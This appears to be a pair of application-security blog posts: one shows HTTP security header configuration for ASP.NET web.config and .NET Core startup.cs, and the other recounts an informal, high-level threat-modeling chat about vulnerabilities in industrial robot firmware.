Our web.config looked so…. Empty.

Just now, I added back the headers but I added them to the startup.cs file in my .Net Core app, which you can watch here. Special thanks to Damien Bod for help with the .Net Core twist.

If you want in-depth details about what we did on the show and what each security header means, you should read Franziska’s blog post. She explains every step, and if you are trying to add security headers for the first time to your web.config (ASP.Net, not .Net CORE), you should definitely read it.

The new code for ASP.Net in your web.config looks like this:

<! — Start Security Headers →
<httpProtocol>
<customHeaders>
<add name=”X-XSS-Protection” value=”1; mode=block”/>
<add name=”Content-Security-Policy” value=”default-src ‘self’”/>
<add name=”X-frame-options” value=”SAMEORIGIN”/>
<add name=”X-Content-Type-Options” value=”nosniff”/>
<add name=”Referrer-Policy” value=”strict-origin-when-cross-origin”/>
<remove name=”X-Powered-By”/>
</customHeaders>
</httpProtocol>
<! — End Security Headers →

Our new-and-improved Web.Config!

And the new code for my startup.cs (.Net CORE), looks like this (Thank you Damien Bod):

//Security headers make me happy
app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());
app.UseXContentTypeOptions();
app.UseReferrerPolicy(opts => opts.NoReferrer());
app.UseXXssProtection(options => options.EnabledWithBlockMode());
app.UseXfo(options => options.Deny());

app.UseCsp(opts => opts
.BlockAllMixedContent()
.StyleSources(s => s.Self())
.StyleSources(s => s.UnsafeInline())
.FontSources(s => s.Self())
.FormActions(s => s.Self())
.FrameAncestors(s => s.Self())
.ImageSources(s => s.Self())
.ScriptSources(s => s.Self())
);
//End Security Headers

Our beautiful security headers!

In future episodes we will also add:

  • Secure settings for our cookies
  • X-Permitted-Cross-Domain-Policies: none
  • Expect-CT: (not currently supported by our provider)
  • Feature-Policy: camera ‘none’; microphone ‘none’; speaker ‘self’; vibrate ‘none’; geolocation ‘none’; accelerometer ‘none’; ambient-light-sensor ‘none’; autoplay ‘none’; encrypted-media ‘none’; gyroscope ‘none’; magnetometer ‘none’; midi ‘none’; payment ‘none’; picture-in-picture ‘none’; usb ‘none’; vr ‘none’; fullscreen *;

For more information on all of these security headers, I strongly suggest you read the OWASP Security Headers Guidance.

We now have good marks from all of the important places, https://securityheaders.comhttps://www.ssllabs.com and http://hardenize.com, but hope to improve our score even further.

For more information, watch our show! Every Sunday from 1–2 pm EDT, on Mixer and Twitch, and recordings are available later on our YouTube channel.

Please use every security header that is available and applicable to you.

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!

Hacking Robots and Eating Sushi

Jesse Honnes and his rebots

I recently had dinner with an old friend, Jesse Hones, the Engineering Manager of Systems / Senior Software Developer of Aprel. I remember when we first met he explained that he designed and programmed robots to measure radio frequencies at extremely precise levels. Fast forward a decade; I am an ethical hacker and he is designing more complex robots than ever before. So I did what anyone would do; I asked him to come on the OWASP DevSlop show and talk about hacking robots.

Jesse Hones and one of his many robots.

His answer was “Not yet. I can’t tell you what all the loopholes are, because I still need those to get my job done.”

Interest piqued.

He explained that previously robot firmware was all custom; each system it’s own unique snowflake. Like custom software is today, ripe with vulnerabilities, however you can only hack them one system at a time. Recently this has changed, he explained, things are standardizing and many use the same components, which all run the same firmware. I asked if this was like Windows XP back in the day, in that almost everyone is running it so when a bug is discovered *every* system is vulnerable. He said yes.

But Jesse is a developer, not a security person, so he looks at it with the “I need to make sure this runs properly” lens, not the “I want to make this robot do my bidding!” viewpoint of an ethical hacker.

More of Jesse’s robots.

Obviously, I had to threat model the situation immediately. Poor Jesse.

Me: What if malware is created that stops production for all affected robots?

Jesse: Yes, this would be costly.

Me: What about ransomware?

Jesse: <unhappy face>

Me: What if someone takes over the robots and has them implant something in every 20th chip it makes to spy on the users? As a supply chain attack?

Jesse: Yes, that would be very bad. However this could change soon; we may be switching over to Windows Embedded.

Me: Okay…. But what if a company used robots Stuxnet style and slowly sabotaged their competitors? So they could never quite finish their R&D on a product? Meanwhile stealing their ideas? Think Stuxnet meets Schindler’s List.

Jesse: …

Me: What if someone uses them to mine bitcoin? Robot Crypto Pirates!

Jesse: I guess tha-

Me: What if robots become the weak point of most networks and are used regularly as pivot points by hackers?

At this point Jesse has resorted to quietly waiting for me to calm down. I look at him.

Me: What if a robot murders someone?

Jesse: That would be the end. The industry could not survive. That cannot be allowed to happen. Ever.

Sounds like we need more robot hackers.

For content and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!